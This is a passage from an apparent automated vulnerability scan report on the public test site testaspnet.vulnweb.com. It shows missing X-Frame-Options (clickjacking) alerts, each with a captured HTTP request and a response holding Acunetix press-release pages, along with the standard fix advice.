          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>5/16/2019 12:32:30 PM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> &ndash; <strong>May 2019</strong> &ndash; Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p>     <p>&ldquo;No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,&rdquo; said Nicolas Sciberras, CTO.</p>     <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p>     <p><strong>More Features in the Latest Build</strong></p>     <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). 
This new build also includes:</p>     <p>- Support for IPv6<br />     - Improved usage of machine resources<br />     - Added support for Selenium scripts as import files<br />     - Multiple vulnerability checks for SAP<br />     - Unauthorized access detection for Redis and Memcached<br />     - Source code disclosure for Ruby and Python</p>     <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p>     <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p>     <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p>     <p><strong>Acunetix, the Company</strong></p>     <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. 
It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          X-Frame-Options
          Solution

          Most modern web browsers support the X-Frame-Options HTTP header. Ensure it is set on all web pages returned by your site. If you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET), use SAMEORIGIN; if you never expect the page to be framed, use DENY. Alternatively, consider implementing Content Security Policy's "frame-ancestors" directive.

        11. GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=2
          Alert tags
          Alert description

          The X-Frame-Options header, which protects against 'ClickJacking' attacks, is not included in the HTTP response.

          Request
          Request line and header section (341 bytes)
          GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=2 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=2
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:20 GMT
          Content-Length: 30393
          
          
          Response body (30393 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?id=2" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:35:22 AM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix                            Web Vulnerability Scanner 2 </strong></p>                           <p>21 July 2005 - <strong>Start-up company Acunetix released                            Acunetix Web Vulnerability Scanner: a tool to automatically                            audit website security. Acunetix Web Vulnerability Scanner                            2 crawls an entire website, launches popular web attacks                            (SQL Injection etc.) and identifies vulnerabilities                            that need to be fixed.</strong> </p>                           <p><strong>Securing your website should be your number one                            concern</strong><br />                           Hackers are concentrating their efforts on web-based                            applications - 75% of cyber attacks are done at the                            web application level, a Gartner Group study has revealed.                            Web applications are accessible 24 hours a day, 7 days                            a week and control valuable data such as customer information,                            transaction information and even proprietary corporate                            data.</p>                           <p><strong>500,000 customer credit card numbers obtained via                            a web attack</strong><br />                           Well-known sites that were open to web application attacks                            include fashion label Guess and pet supply retailer                            PetCo.com who were notoriously found to be vulnerable                            to the SQL injection vulnerability (June 2003). 
This                            resulted in PetCo leaving as many as 500,000 credit                            card numbers open to anyone able to construct this specially-crafted                            URL.</p>                           <p><strong>Firewalls, SSL and locked-down servers are futile                            against web application hacking</strong><br />                           Any defense at network security level will provide no                            protection against web application attacks since they                            are launched on port 80 - which has to remain open.                            In addition, web applications (customer areas, shopping                            carts etc.) are often tailor-made, invariably tested                            less than off-the-shelf software and are therefore more                            susceptible to attack.</p>                           <p>&quot;Companies have implemented network-level security,                            however they fail to audit and secure their web applications.                            These applications have access to sensitive data and                            are a hacker's prime target,&quot; said Nick Galea,                            CEO of Acunetix. &quot;Auditing one's web apps should                            be the number one security concern.&quot;</p>                           <p><strong>The need for an automated web application vulnerability                            scanner</strong><br />                           Manually auditing a web application for vulnerabilities                            to SQL injection, cross site scripting and other web                            attacks is virtually impossible. With Acunetix Web Vulnerability                            Scanner the process of auditing web applications such                            as shopping carts and forms, can be easily automated.                            
What's more, the security checks can easily be re-launched                            for each application update.</p>                           <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br />                           Acunetix WVS first crawls the whole website, analyzes                            in-depth each file it finds, and displays the entire                            website structure. After this discovery stage, it performs                            an automatic audit for common security vulnerabilities.</p>                           <p><strong>Automatically detects SQL injection, cross site                            scripting and other web vulnerabilities</strong><br />                           SQL injection is a hacking technique which modifies                            SQL commands in order to gain access to data in the                            database. Cross site scripting attacks allow a hacker                            to execute a malicious script on your visitors' browser.                            Acunetix Web Vulnerability Scanner can check if your                            web application is vulnerable to both of these attacks.                            
More information about cross site scripting &amp; SQL                            injection at our website security info page.</p>                           <p><strong>Acunetix Web Vulnerability Scanner also checks for                            the following web attacks:</strong></p>                           <ul> <li>CRLF injection attacks<br />                           </li><li>Code execution attacks<br />                           </li><li>Directory traversal attacks<br />                           </li><li>File inclusion attacks<br />                           </li><li> Input validation attacks<br />                           </li><li>Authentication attacks.</li> </ul>                           <p><strong>Advanced penetration testing tools</strong><br />                           Acunetix WVS also includes tools such as an HTTP editor                            &amp; HTTP sniffer to allow customization of web vulnerability                            checks. Using the Vulnerability editor, new attacks                            can easily be created.</p>                           <p><strong>Pricing &amp; availability</strong><br />                           Acunetix WVS is available as an enterprise or as a consultant                            version. A subscription based license can be purchased                            for as little as $395, whereas a perpetual license starts                            at $2995. For more information visit our pricing page.</p>                           <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. 
Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          X-Frame-Options
          Solution

          Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site. If you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET), use SAMEORIGIN; if you never expect the page to be framed, use DENY. Alternatively, consider implementing Content Security Policy's "frame-ancestors" directive.

        12. GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=3
          Alert tags
          Alert description

          X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.

          Request
          Request line and header section (341 bytes)
